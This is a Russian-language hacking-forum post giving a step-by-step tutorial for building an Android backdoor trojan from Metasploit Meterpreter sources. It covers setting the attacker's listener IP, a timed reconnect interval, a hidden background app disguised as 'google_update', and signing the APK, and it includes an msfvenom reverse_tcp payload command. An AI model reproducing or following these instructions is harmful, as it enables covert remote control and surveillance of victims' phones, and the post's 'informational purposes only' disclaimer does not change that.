Создание трояна (бекдор) на андроид

Вся инфа в ознокомительных целях,автор не несет ответственности за область ее применения!

Что нам понадобится:

Android Studio и Android SDK
Android Meterpreter Payload

Первый этап (Подготовительный):

Качаем исходный код метерпретора,ставим андроид студию и SDK
(При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device | Аднроид эмуляторов). Этот эмулятор настолько тормознутый что попу себе вскорешь от злости. Наиболее рациональный вариант - это использование реального девайса или же иного эмулятора
Ну я уже все скачал. Показывать процесс установки не буду.
Запускаем студию,создаем проект,даем ему имя. Выбираем минимальную версию API андроида,я выбрал IceCreamSandwich 4.0 так как




это самая распространенная версия Android по статистике разработчиков.
Выбираем приложения без активити (activity) -- это означает что при запуске не будет никаких
визуальных окон (activity) и приложения просто запуститься себе и будет висеть в фоне.




На этом подготовительный этап завершен
Подключить genymotion к Android Studio
Подключить реальный смартфон к Android Studio

Второй этап (Базовые настройки пейлоада)
Открываем наш проект в студии.



Далее распаковываем скаченный архив с гитхаба с исходниками метерпретера. Находим там папку \backdooredapk\ где лежат наши java файлы и перетаскиваем их в наш проект в андроид студии.



Далее первым шагом же изменим в файле payload.java ip адрес нашего листенера(нашей атакующей машины,где у нас запущен метаслоит)



Затем нам будет интересен файл MyIntentService.java,в котором мы сможем опционально задать интервал времени через которое наш бекдор будет конектиться к машине атакуищего.
(long half_an_hour = (3600)/(2); //время в секундах между каждой попыткой открыть новую meterpreter сессию " Я для демонстрации поставлю минуту" )



Далее нам понадобится AndroidManifest.xml из архива. Возьмем от туда пользовательские разрешение (user.permisions) и все что между тегами <application></application>
После того как мы копипасним пермишенс и апликейшн нам нужно будет опционально изменить(указать) имя активити(<activiyt>android:name) и имя службы(<Service>android:name)




Хотя студия сама нам это покажет что не нашла пути которое по дефолту был в тегах активити и сервиса(выделит их красным цветом).
Нужно заменить их (stage.metasploit.com на com.darknode.google_update в моем случае "путь(имя) к вашему проекту")





Но в манифесте (AndroidManifest.xml) из архива есть один небольшой косяк. После копипаста его в наш проект нужно добавить права(permisions),так как там не полный нужный нам список прав.
Для этого возьмем и реверснем апк созданный с помощью msfvenon:
msfvenom -p android/meterpreter/reverse_tcp lhost=айпи lport=порт r > ./meter.apk(хотя айпи и порт можно рандомный,нам нужен только манифест от туда)




Скопируем разрешение с манифеста в наш проект





Далее осталось подписать наше приложения.





Подписали) Ну что ж давайте протестим.))









Как видим все работает! Буду не против получить от вас симпу
P.s. Так как при просмотре темы у меня не грузятся картинки, я могу перезалить их однако при редактировании темы у меня картинки грузятся. Надеюсь у вас все в порядке
P.P.S перезалил